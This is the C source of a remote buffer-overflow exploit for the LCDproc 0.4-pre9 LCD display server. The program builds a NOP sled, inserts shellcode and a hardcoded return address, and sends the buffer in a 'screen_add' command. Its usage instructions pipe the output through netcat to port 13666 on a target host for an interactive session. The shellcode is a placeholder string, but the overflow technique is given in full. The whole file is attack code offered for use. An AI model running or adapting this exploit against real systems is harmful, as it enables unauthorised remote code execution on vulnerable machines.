/*****
 * lcdproc-exploit.c
 *****
 *
 * LCDproc 0.4-pre9 exploit
 #
 # Andrew Hobgood <chaos@strange.net>
 * Kha0S on #LinuxOS/EFnet
 *
 * Tested on Linux/x86 2.2.5-15smp (the only Intel 
 * box I could get my hands on for testing).
 *
 *****
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFFERSIZE 269
#define NOP 0x90
#define OFFSET 0xbffff750

char shellcode[] = "Standardshellcode";

int main(int argc, char **argv) {
 char *ptr, buffer[BUFFERSIZE];
 unsigned long *long_ptr, offset = OFFSET;
 int aux;

 fprintf(stderr, "LCDproc exploit by Andrew Hobgood "
                 "<chaos@strange.net>\n\n");
 fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc "
                  "<target> 13666\n\n", argv[0]);

 if (argc == 2) offset += atol(argv[1]);

 ptr = buffer;
 memset(ptr, 0, sizeof(buffer));
 memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16);
 ptr += sizeof(buffer) - strlen(shellcode) - 16;
 memcpy(ptr, shellcode, strlen(shellcode));
 ptr += strlen(shellcode);
 long_ptr = (unsigned long *) ptr;
 for(aux=0; aux<4; aux++) *(long_ptr++) = offset;
 ptr = (char *) long_ptr;
 *ptr = '\0';
 fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer));
 fprintf(stderr, "Offset: 0x%lx\n\n", offset);
 printf("hello\n");
 fflush(stdout);
 sleep(1);
 printf("screen_add {%s}\n", buffer);
 fflush(stdout);
 return(0);
}